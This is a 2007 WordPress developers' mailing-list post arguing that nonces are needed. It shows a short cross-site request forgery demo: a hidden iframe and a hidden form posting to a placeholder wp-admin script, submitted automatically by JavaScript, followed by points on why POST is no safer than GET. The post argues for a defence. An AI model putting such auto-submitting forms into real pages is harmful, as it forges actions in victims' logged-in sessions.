[wp-hackers] Any other way to do it? (or, do we really need Nonces?)

Scott Yang scott.yang at gmail.com
Fri Mar 2 20:11:53 GMT 2007


Hmm...

<!-- Hidden iframe: the POST response lands here, so the victim sees nothing -->
<iframe name="foo" style="display:none"></iframe>
<!-- Hidden form aimed at the target site; the browser attaches the victim's cookies -->
<form name="bar" target="foo" method="post"
action="http://yoursite/wp-admin/bad-script.php" style="display:none">
<input type="hidden" name="var1" value="value1"/>
<input type="hidden" name="var2" value="value2"/>
<input type="hidden" name="var3" value="value3"/>
</form>

<script type="text/javascript">
document.forms['bar'].submit();
</script>

1. You can certainly post to a form outside your domain.
2. You can hide the form as well.
3. You can automate it via JavaScript.
4. POST is about as insecure as GET.

-Scott


On 3/3/07, Elliotte Harold <elharo at metalab.unc.edu> wrote:
> The difference is you don't need to convince me to click on a link. You
> can force my browser to follow a link in several ways without any human
> intervention. That isn't the case with POST. I brought up the JavaScript
> because it had been suggested that could be used to force a POST without
> human intervention. I'm not sure that's true but it's worth investigating.

